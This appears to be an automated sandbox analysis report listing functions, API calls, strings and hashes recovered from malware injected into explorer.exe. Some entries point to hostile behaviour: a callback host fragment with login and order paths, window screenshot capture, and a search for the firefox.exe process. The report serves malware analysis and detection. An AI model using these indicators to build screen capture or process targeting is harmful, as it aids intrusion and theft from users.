Function 08B9B400 Relevance: 15.2, APIs: 5, Strings: 5, Instructions: 235COMMON

Download Yara Rule

APIs

Part of subcall function 08B9B8BC: malloc.LIBCMT ref: 08B9B90D

malloc.LIBCMT ref: 08B9B445

Part of subcall function 08B923C4: _FF_MSGBANNER.LIBCMT ref: 08B923F4
Part of subcall function 08B923C4: _NMSG_WRITE.LIBCMT ref: 08B923FE
Part of subcall function 08B923C4: _callnewh.LIBCMT ref: 08B92432
Part of subcall function 08B923C4: _errno.LIBCMT ref: 08B9243D
Part of subcall function 08B923C4: _errno.LIBCMT ref: 08B92448

free.LIBCMT ref: 08B9B7A4
free.LIBCMT ref: 08B9B7AC
free.LIBCMT ref: 08B9B7B4
free.LIBCMT ref: 08B9B7BC

Strings

/login.php, xrefs: 08B9B4DE
PRI * HTTP/2.0, xrefs: 08B9B4A3
er.backlinker.pro, xrefs: 08B9B689
order.php, xrefs: 08B9B562
&browser=, xrefs: 08B9B57C

Memory Dump Source

Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd

Yara matches

Similarity

API ID: free$_errnomalloc$_callnewh
String ID: &browser=$/login.php$PRI * HTTP/2.0$er.backlinker.pro$order.php
API String ID: 1604647524-1708799525
Opcode ID: 4b2b1adf0043a65120d632aea126014985a15e54a3d7811ee83749d63c7197c5
Instruction ID: 5b14780d5e46c8018190f1d8d739522958ef069951ba178d2d74cab01d007484
Opcode Fuzzy Hash: 4b2b1adf0043a65120d632aea126014985a15e54a3d7811ee83749d63c7197c5
Instruction Fuzzy Hash: 4CA15032604B82C7DB24DF26F86479A77A1F789B95F448026DACA47B28DF3CD149CB40

Function 0F3D99D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 0F3D99F8
CreateCompatibleDC.GDI32 ref: 0F3D9A01
CreateCompatibleBitmap.GDI32 ref: 0F3D9A1F
SelectObject.GDI32 ref: 0F3D9A2E
PrintWindow.USER32 ref: 0F3D9A3D
DeleteObject.GDI32 ref: 0F3D9A89
DeleteDC.GDI32 ref: 0F3D9A92

Strings

, xrefs: 0F3D9A59

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: CompatibleCreateDeleteObjectWindow$BitmapPrintRectSelect
String ID:
API String ID: 2993826089-3916222277
Opcode ID: 7c5c0b0e52ec7e256b54492c0aeda894a87f46ce7d64ba09fe0c59287d068dc5
Instruction ID: a94f0c50b0fca4bec3ddb302643247fc588b923c38d98ff09a1dda7ceaa4e82f
Opcode Fuzzy Hash: 7c5c0b0e52ec7e256b54492c0aeda894a87f46ce7d64ba09fe0c59287d068dc5
Instruction Fuzzy Hash: 5F213C767147518BD7208F52E80871AB761F788FE0F544135EE8643B28CF7DD9898B40

Function 0F3CDA5C Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0F3CDA75
__int64.LIBCPMT ref: 0F3CDA8D

Part of subcall function 0F3CF2A0: std::_Lockit::_Lockit.LIBCPMT ref: 0F3CF2B6
Part of subcall function 0F3CF2A0: std::_Lockit::~_Lockit.LIBCPMT ref: 0F3CF2D9

std::locale::_Getfacet.LIBCPMT ref: 0F3CDA98
std::_Facet_Register.LIBCPMT ref: 0F3CDADA
std::_Lockit::~_Lockit.LIBCPMT ref: 0F3CDAE4
std::bad_exception::bad_exception.LIBCMT ref: 0F3CDB08
_CxxThrowException.LIBCMT ref: 0F3CDB19

Strings

bad cast, xrefs: 0F3CDAFC

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_GetfacetRegisterThrow__int64std::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 3923862141-3145022300
Opcode ID: e102a9ad19a8e7a41025c77a454af6dd80fba04dfcb66e042701d1384f84c676
Instruction ID: 2ee659ef1879f2c92a31a7db11531419d02739f780822177f8e45649d80857b5
Opcode Fuzzy Hash: e102a9ad19a8e7a41025c77a454af6dd80fba04dfcb66e042701d1384f84c676
Instruction Fuzzy Hash: 8A115426304B8591DE14EB26F44036AB361F7C8BF4F884235AA6D4BBA9DF7CD905C740

Function 0F3CD998 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0F3CD9B1
__int64.LIBCPMT ref: 0F3CD9C9

Part of subcall function 0F3CF2A0: std::_Lockit::_Lockit.LIBCPMT ref: 0F3CF2B6
Part of subcall function 0F3CF2A0: std::_Lockit::~_Lockit.LIBCPMT ref: 0F3CF2D9

std::locale::_Getfacet.LIBCPMT ref: 0F3CD9D4
std::_Facet_Register.LIBCPMT ref: 0F3CDA16
std::_Lockit::~_Lockit.LIBCPMT ref: 0F3CDA20
std::bad_exception::bad_exception.LIBCMT ref: 0F3CDA44
_CxxThrowException.LIBCMT ref: 0F3CDA55

Strings

bad cast, xrefs: 0F3CDA38

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_GetfacetRegisterThrow__int64std::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 3923862141-3145022300
Opcode ID: 0ef9bf9b3a3c8b1d7c1c14e83a5549400158f30c5fd718d05e14695aac5f073c
Instruction ID: 89e22f78c223ceb0dd9e9d1b661fd52438e61df1b0bc4410e35752fed93a7a08
Opcode Fuzzy Hash: 0ef9bf9b3a3c8b1d7c1c14e83a5549400158f30c5fd718d05e14695aac5f073c
Instruction Fuzzy Hash: 5E118226304B4581DE10DB26F84036AA361F789BF4F884235AAAD0BFA9DF7CD506C740

Function 0F3C16C0 Relevance: 13.6, APIs: 9, Instructions: 118stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0F3C1858: isdigit.MSVCRT ref: 0F3C187E

tolower.MSVCRT ref: 0F3C1723

Part of subcall function 0F3C1578: _malloc_dbg.MSVCRT ref: 0F3C1588

memcpy.MSVCRT ref: 0F3C17A4
_errno.MSVCRT ref: 0F3C17AA
strtod.MSVCRT ref: 0F3C17C6
_errno.MSVCRT ref: 0F3C181F

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$_malloc_dbgisdigitmemcpystrtodtolower
String ID:
API String ID: 2125118114-0
Opcode ID: ef73b49cf0c9cd64157d83e6bf4c348908b8249506494ccf4071268af3775682
Instruction ID: 49732ee38c43e1f9e0ef7424d522020ee5a29b84cbe5c5054019ed2a30d84857
Opcode Fuzzy Hash: ef73b49cf0c9cd64157d83e6bf4c348908b8249506494ccf4071268af3775682
Instruction Fuzzy Hash: D941E432A1475186EB20AF22D40072E77B5F348FA4F848439CE4657B26DB3DD895D780

Function 08CB3BE4 Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 08CB3C40
DecodePointer.KERNEL32 ref: 08CB3C5E
EncodePointer.KERNEL32 ref: 08CB3C8C
DecodePointer.KERNEL32 ref: 08CB3CA1
EncodePointer.KERNEL32 ref: 08CB3CAC
DecodePointer.KERNEL32 ref: 08CB3CBE
DecodePointer.KERNEL32 ref: 08CB3CCE
__crtCorExitProcess.LIBCMT ref: 08CB3D52
ExitProcess.KERNEL32 ref: 08CB3D5A

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$EncodeExitProcess$__crt
String ID:
API String ID: 3248576438-0
Opcode ID: d77485e4ae4fd7f4c40678f353edd168e35972fc864df4be1653533e39431785
Instruction ID: 1d325d754b21e143a43c7f7c349fe2458b298ab26267c129472c6bec238cbec4
Opcode Fuzzy Hash: d77485e4ae4fd7f4c40678f353edd168e35972fc864df4be1653533e39431785
Instruction Fuzzy Hash: 87418D31216F8081F7549F25F85475A76B4F788B95F448529EE8E43B24DF3CC8968B10

Function 0F3C7100 Relevance: 13.6, APIs: 9, Instructions: 83stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0F3C76BC: lstrlenA.KERNEL32 ref: 0F3C76E8

lstrlenA.KERNEL32 ref: 0F3C7150
lstrlenA.KERNEL32 ref: 0F3C7162
_malloc_dbg.MSVCRT ref: 0F3C7173
memset.MSVCRT ref: 0F3C718C
memcpy.MSVCRT ref: 0F3C71A6
memcpy.MSVCRT ref: 0F3C71B6
memcpy.MSVCRT ref: 0F3C71CF
memcpy.MSVCRT ref: 0F3C71F1
??3@YAXPEAX@Z.MSVCRT ref: 0F3C71FA

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy$lstrlen$??3@_malloc_dbgmemset
String ID:
API String ID: 1784580453-0
Opcode ID: 8561b7d2a29b084477e0969429557f4ef6bc96801b895d2568cf40bf8b51876b
Instruction ID: 553d2576ddef46cfe5161ec1bbd3c2bb68f6f409b100df9f41475dc4fbc3856a
Opcode Fuzzy Hash: 8561b7d2a29b084477e0969429557f4ef6bc96801b895d2568cf40bf8b51876b
Instruction Fuzzy Hash: D021E43671068186EB21DF66E8047A9B7A1FB48FE4F844439DE5A43B20EF3DD589CB40

Function 0C36EAB8 Relevance: 12.6, APIs: 10, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0C36EAE6

Part of subcall function 0C36C2E4: _errno.LIBCMT ref: 0C36C304

free.LIBCMT ref: 0C36EAFB
free.LIBCMT ref: 0C36EB1C
free.LIBCMT ref: 0C36EB31
free.LIBCMT ref: 0C36EB45
free.LIBCMT ref: 0C36EB51
free.LIBCMT ref: 0C36EB6F
free.LIBCMT ref: 0C36EB8F
free.LIBCMT ref: 0C36EBA8
free.LIBCMT ref: 0C36EBD4

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 80ed7709b81fb865fd2701c9381c00cfa0a9080e0d9e421e8263a039d25805be
Instruction ID: e9624a8ca3e1ca9c8cbd35f523b19296d12a6cfa950843e9db02416c9ece646b
Opcode Fuzzy Hash: 80ed7709b81fb865fd2701c9381c00cfa0a9080e0d9e421e8263a039d25805be
Instruction Fuzzy Hash: 8E314D25336A4481FE54EBA6F851B642330FB48B94F18D311ED5A57AA8DFBCC148CB15

Function 08B92CEC Relevance: 12.6, APIs: 10, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 08B92D1A

Part of subcall function 08B92384: _errno.LIBCMT ref: 08B923A4

free.LIBCMT ref: 08B92D2F
free.LIBCMT ref: 08B92D50
free.LIBCMT ref: 08B92D65
free.LIBCMT ref: 08B92D79
free.LIBCMT ref: 08B92D85
free.LIBCMT ref: 08B92DA3
free.LIBCMT ref: 08B92DC3
free.LIBCMT ref: 08B92DDC
free.LIBCMT ref: 08B92E08

Memory Dump Source

Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: f7051a25efdbd17a82a2807977a1313b5b3715d4396367db5dc6440f37134454
Instruction ID: 334a08dc5d6b0399cebb8dbbbbd363544c03011d4c60787c9561d2e745269a21
Opcode Fuzzy Hash: f7051a25efdbd17a82a2807977a1313b5b3715d4396367db5dc6440f37134454
Instruction Fuzzy Hash: B6313025A05A01A5EF2DDB55E8903683364FF84B96F488275CAFD0B760EFBCC05C8356

Function 08CBB14B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 08CBB176
RaiseException.KERNEL32 ref: 08CBB19F
__DestructExceptionObject.LIBCMT ref: 08CBB200
_getptd.LIBCMT ref: 08CBB153

Part of subcall function 08CB4B34: _getptd_noexit.LIBCMT ref: 08CB4B3A
Part of subcall function 08CB4B34: _amsg_exit.LIBCMT ref: 08CB4B4A

_getptd.LIBCMT ref: 08CBB205
_getptd.LIBCMT ref: 08CBB211

Strings

csm, xrefs: 08CBB1D3

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
String ID: csm
API String ID: 1037122555-1018135373
Opcode ID: 9a2fc0b797f98f79fe4a14a5232f7452d79c1f12860342049905014b00c6b91d
Instruction ID: db3d92fd5e4403cf97fcf8ac69a905e784b6f6a06a28bc780df632bb258a1637
Opcode Fuzzy Hash: 9a2fc0b797f98f79fe4a14a5232f7452d79c1f12860342049905014b00c6b91d
Instruction Fuzzy Hash: 85212C3A204A94C6D634DF56E08039EB771F389BA6F454226CFEA07B54CF39D986DB01

Function 0F3E0F5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 0F3E0F8A
RaiseException.KERNEL32 ref: 0F3E0FB3
__DestructExceptionObject.LIBCMT ref: 0F3E1014
_getptd.LIBCMT ref: 0F3E0F67

Part of subcall function 0F3DFFDC: _getptd_noexit.LIBCMT ref: 0F3DFFE2
Part of subcall function 0F3DFFDC: _amsg_exit.LIBCMT ref: 0F3DFFF2

_getptd.LIBCMT ref: 0F3E1019
_getptd.LIBCMT ref: 0F3E1025

Strings

csm, xrefs: 0F3E0FE7

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
String ID: csm
API String ID: 1037122555-1018135373
Opcode ID: 16076cd70ee89e0090311c6e33922bef2e7ed2237c2f23457eed0913bfab5565
Instruction ID: 719e763c65b73161b21dff463e09922e900647ffab5b150bfee8445aab4967d8
Opcode Fuzzy Hash: 16076cd70ee89e0090311c6e33922bef2e7ed2237c2f23457eed0913bfab5565
Instruction Fuzzy Hash: E421577720479586C630DF22E04036EB760FB89BB4F444222DF9A07B95CB3DE886CB01

Function 0C35CD98 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0C35CDB1
__int64.LIBCPMT ref: 0C35CDC9

Part of subcall function 0C35E6A0: std::_Lockit::_Lockit.LIBCPMT ref: 0C35E6B6

std::locale::_Getfacet.LIBCPMT ref: 0C35CDD4
std::_Facet_Register.LIBCPMT ref: 0C35CE16
std::bad_exception::bad_exception.LIBCMT ref: 0C35CE44
_CxxThrowException.LIBCMT ref: 0C35CE55

Strings

essorFeaturePresent, xrefs: 0C35CE49

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_GetfacetRegisterThrow__int64std::bad_exception::bad_exceptionstd::locale::_
String ID: essorFeaturePresent
API String ID: 229301282-742855693
Opcode ID: 6b381f35d24918e929dfa518e24938e6305590d9e013242fead008017973fe58
Instruction ID: c2f590d2e7c9164fcc6785189c6c0f17318b12e78164cc8ae5fc9f70df6fa720
Opcode Fuzzy Hash: 6b381f35d24918e929dfa518e24938e6305590d9e013242fead008017973fe58
Instruction Fuzzy Hash: 89118271324B8491DE10EB16F440799A361F788BE4F9892219E6D47FA8EF7CD14ECB01

Function 0C35CE5C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0C35CE75
__int64.LIBCPMT ref: 0C35CE8D

Part of subcall function 0C35E6A0: std::_Lockit::_Lockit.LIBCPMT ref: 0C35E6B6

std::locale::_Getfacet.LIBCPMT ref: 0C35CE98
std::_Facet_Register.LIBCPMT ref: 0C35CEDA
std::bad_exception::bad_exception.LIBCMT ref: 0C35CF08
_CxxThrowException.LIBCMT ref: 0C35CF19

Strings

essorFeaturePresent, xrefs: 0C35CF0D

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_GetfacetRegisterThrow__int64std::bad_exception::bad_exceptionstd::locale::_
String ID: essorFeaturePresent
API String ID: 229301282-742855693
Opcode ID: 9512719c947435c3d1f14965cb90e4aa7fc872366403922b4a8468ee3170a9cc
Instruction ID: 6c025cfa18dd45f3f3e28fdc29b9956070f81fb07160112c47dcdc04dc95e8eb
Opcode Fuzzy Hash: 9512719c947435c3d1f14965cb90e4aa7fc872366403922b4a8468ee3170a9cc
Instruction Fuzzy Hash: 11116025324B8581DE10EB16F4407A9B361F788BE4F58D3219A5D47FA8EF78C50ACB01

Function 0F3DA214 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41processstringCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0F3DA226
Process32First.KERNEL32 ref: 0F3DA248
lstrcmpiA.KERNEL32 ref: 0F3DA260
OpenProcess.KERNEL32 ref: 0F3DA276
Process32Next.KERNEL32 ref: 0F3DA289
CloseHandle.KERNEL32 ref: 0F3DA297

Strings

firefox.exe, xrefs: 0F3DA254

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextOpenProcessSnapshotToolhelp32lstrcmpi
String ID: firefox.exe
API String ID: 3301242143-3034799888
Opcode ID: 62879796713b84d97d8f7283142b097a12a321dffc23b79af45d718103d110c7
Instruction ID: a5741a09769e63006f5f30cabb2923f33f09411b2db690aa44725491933f458f
Opcode Fuzzy Hash: 62879796713b84d97d8f7283142b097a12a321dffc23b79af45d718103d110c7
Instruction Fuzzy Hash: E501C472708A45C6EF209B26F94037A63A1F78CBB0F844234EA6946BE5DF2CC2489600

Function 0F3E4E98 Relevance: 12.2, APIs: 8, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_crt.LIBCMT ref: 0F3E4EC1

Part of subcall function 0F3DE9C4: malloc.LIBCMT ref: 0F3DE9EF
Part of subcall function 0F3DE9C4: Sleep.KERNEL32 ref: 0F3DEA02

free.LIBCMT ref: 0F3E4FC2
free.LIBCMT ref: 0F3E4FDE

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: free$Sleep_malloc_crtmalloc
String ID:
API String ID: 2523592665-0
Opcode ID: de62eea6751175f8c69b650b8628bb1470fc8a834dbeb80777570af6dbaca5fc
Instruction ID: f93a2c992e60c56a826fa870a9046322a4d76b7f0bd3d2ca058513507ef3916e
Opcode Fuzzy Hash: de62eea6751175f8c69b650b8628bb1470fc8a834dbeb80777570af6dbaca5fc
Instruction Fuzzy Hash: BB519D26301B5192DB24DF26E98076A73A4FB88BA8F484235AF5C47F51DF38D566C740

Function 0C37B9A8 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0C37B9D3
_errno.LIBCMT ref: 0C37B9C8

Part of subcall function 0C36CE70: _getptd_noexit.LIBCMT ref: 0C36CE74

_errno.LIBCMT ref: 0C37BA76
_invalid_parameter_noinfo.LIBCMT ref: 0C37BA81

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
String ID:
API String ID: 1573762532-0
Opcode ID: 211058e9f55984555118f162df26db9c9fa79f165e5373f0072c07de477b66e2
Instruction ID: 0078fed0374e27202e59b3cf733cc5181722170808f775dfa8c8ef43c2970573
Opcode Fuzzy Hash: 211058e9f55984555118f162df26db9c9fa79f165e5373f0072c07de477b66e2
Instruction Fuzzy Hash: C541E172B3129983DF74AB2291906BAF2B0F740B98BA84316EBD547A88D73CC151CF00

Function 0F3EC5A8 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0F3EC5D3
_errno.LIBCMT ref: 0F3EC5C8

Part of subcall function 0F3DDA70: _getptd_noexit.LIBCMT ref: 0F3DDA74

_errno.LIBCMT ref: 0F3EC676
_invalid_parameter_noinfo.LIBCMT ref: 0F3EC681

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
String ID:
API String ID: 1573762532-0
Opcode ID: acb4ed1eb4acd1eeb2d5280860084a6d03a753759c2936a3483095acd42b3401
Instruction ID: 475e99778ce47933115b9c8c9a3171474c0a356f73c6e5072443c5368a083ed7
Opcode Fuzzy Hash: acb4ed1eb4acd1eeb2d5280860084a6d03a753759c2936a3483095acd42b3401
Instruction Fuzzy Hash: A941E3B2A003B586DB289B2195406BE77A0FF50BF4BC86126EB9557AC6D73CE151C700

Function 0C3755F0 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0C375616
_errno.LIBCMT ref: 0C37560B

Part of subcall function 0C36CE70: _getptd_noexit.LIBCMT ref: 0C36CE74

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C375695
_errno.LIBCMT ref: 0C3756A6
_invalid_parameter_noinfo.LIBCMT ref: 0C3756B1

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID:
API String ID: 781512312-0
Opcode ID: 87efd3317a81c0ecb358072b35436e616fdfe8d2fe3bddf9e2026144e3ef5478
Instruction ID: 06669dc1d0f55b4a8c5c718504a3486c9d63a98117816997e60571aa32ef6e47
Opcode Fuzzy Hash: 87efd3317a81c0ecb358072b35436e616fdfe8d2fe3bddf9e2026144e3ef5478
Instruction Fuzzy Hash: CF31F576B312E582DF38AB1291502BD73A0E754BA5FA49326ABD507A88D72CC556CF00

Function 0F3E61F0 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0F3E6216
_errno.LIBCMT ref: 0F3E620B

Part of subcall function 0F3DDA70: _getptd_noexit.LIBCMT ref: 0F3DDA74

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0F3E6295
_errno.LIBCMT ref: 0F3E62A6
_invalid_parameter_noinfo.LIBCMT ref: 0F3E62B1

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID:
API String ID: 781512312-0
Opcode ID: 64b280ef0a08ae1d51dc21ff9ef209cdf5d27a7528d9ce6e267d6ddba166b408
Instruction ID: 55b3562face6f97005c762157ba36021246a08e1b20dc412e21a561c5e3906ef
Opcode Fuzzy Hash: 64b280ef0a08ae1d51dc21ff9ef209cdf5d27a7528d9ce6e267d6ddba166b408
Instruction Fuzzy Hash: 62312B72A243B1C2DF249B1295522BD7360EB70BF5BC44126EBD50BAD6DB2CD551C700

Function 0F3C1D04 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncoll.MSVCRT ref: 0F3C1D9D
_strncoll.MSVCRT ref: 0F3C1DC6
_strncoll.MSVCRT ref: 0F3C1DE9

Strings

false, xrefs: 0F3C1DDC
null, xrefs: 0F3C1D90
true, xrefs: 0F3C1DB9

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: _strncoll
String ID: false$null$true
API String ID: 4138090636-2913297407
Opcode ID: 70884d20571101490070adea5f6472474a62362fd5ccfcd9b5eab5712c25ef6e
Instruction ID: 94b93afa39e6a4917a548c74edd9afea454f3554b724b13935cf7447ced78d40
Opcode Fuzzy Hash: 70884d20571101490070adea5f6472474a62362fd5ccfcd9b5eab5712c25ef6e
Instruction Fuzzy Hash: 5E31017260478181FB20BF36D40432977A49B41FE4F89802ECB098BB97DB3DC980E7A1

Function 0F3C5788 Relevance: 10.6, APIs: 7, Instructions: 66memorythreadprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0F3C579A
GetCurrentProcessId.KERNEL32 ref: 0F3C57D1
GetCurrentThreadId.KERNEL32 ref: 0F3C57DD
HeapAlloc.KERNEL32 ref: 0F3C5807
Thread32Next.KERNEL32 ref: 0F3C5866
CloseHandle.KERNEL32 ref: 0F3C5876

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Current$AllocCloseCreateHandleHeapNextProcessSnapshotThreadThread32Toolhelp32
String ID:
API String ID: 4141954168-0
Opcode ID: db995df24fb14382045024f7a01a40ea28c77ebca70745760b02dfde695fedb4
Instruction ID: f48ce70f661a260d7c5c83f1e7a3de7f9bcfc99c4ed6d52781db6fcba8164591
Opcode Fuzzy Hash: db995df24fb14382045024f7a01a40ea28c77ebca70745760b02dfde695fedb4
Instruction Fuzzy Hash: D721A271604741C7EB60DF31E440369B3A1FB88BB8F488229DA5947B99EF7CEA44CB44

Function 0C37035F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 0C37038A
__DestructExceptionObject.LIBCMT ref: 0C370414
_getptd.LIBCMT ref: 0C370367

Part of subcall function 0C36F3DC: _getptd_noexit.LIBCMT ref: 0C36F3E2
Part of subcall function 0C36F3DC: _amsg_exit.LIBCMT ref: 0C36F3F2

_getptd.LIBCMT ref: 0C370419
_getptd.LIBCMT ref: 0C370425

Strings

csm, xrefs: 0C3703E7

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

